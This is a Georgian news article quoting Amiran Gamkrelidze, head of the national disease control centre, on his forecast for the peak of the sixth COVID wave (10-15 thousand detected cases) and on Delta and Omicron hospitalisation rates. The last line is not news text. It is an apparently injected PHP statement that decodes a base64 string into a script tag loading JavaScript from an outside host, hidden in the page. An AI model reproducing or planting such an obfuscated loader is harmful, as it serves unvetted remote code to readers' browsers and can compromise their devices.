celsiusi
ავერსი შნაიდერი
"ველოდებით, რომ <პანდემიის მე-6 ტალღის> პიკის დროს 10-15 ათასი გამოვლენილი შემთხვევა გვექნება", - ამის შესახებ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ განაცხადა.
 
მან უწყებათშორისი საბჭოს სხდომის დასრულების შემდეგ გამართულ პრესკონფერენციაზე განმარტა, თუ რას გულისხმობდა, როცა თქვა, რომ ყოველდღიურად ინფიცირების 60 ათასამდე ახალი შემთხვევა იქნება ქვეყანაში.
 
„ველოდებით, რომ შემთხვევათა ზრდა ნამდვილად იქნება. პროგნოზების ძირითადი ინსტიტუტების მონაცემებით, ჩვენ პიკში შევალთ იანვრის ბოლოს და თებერვლის დასაწყისში. 60 ათასი შემთხვევა ვახსენე და აიტაცეს. მე არ მითქვამს, რომ 60 ათასი გამოვლენილი შემთხვევა გვექნება ყოველდღიურად.
 
ჩვენ დღესაც გვაქვს გამოვლენილი 7 000 შემთხვევა, მაგრამ რეალურად, ინფიცირებული გვყავს, სავარაუდოდ, ორჯერ მეტი, ზოგიერთ მათგანს აქვს მსუბუქი სურდო, მსუბუქი ხველა, ისინი სამედიცინო დაწესებულებებს არ მიმართავენ ტესტის ჩასატარებლად. პიკზე ველოდებით, რომ გვექნება, დაახლოებით, 10-15 ათასი გამოვლენილი შემთხვევა. იქიდან "დელტას" დროს ჰოსპიტალიზაციის მოთხოვნა იყო 12-15%-ის ფარგლებში, ხოლო "ომიკრონის" დროს მაჩვენებელი მერყეობს 5-10%-ის ფარგლებში, იკლებს პაციენტების რაოდენობა ინტენსიური თერაპიების განყოფილებებში და ა.შ.“, - განაცხადა ამირან გამყრელიძემ.
920
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");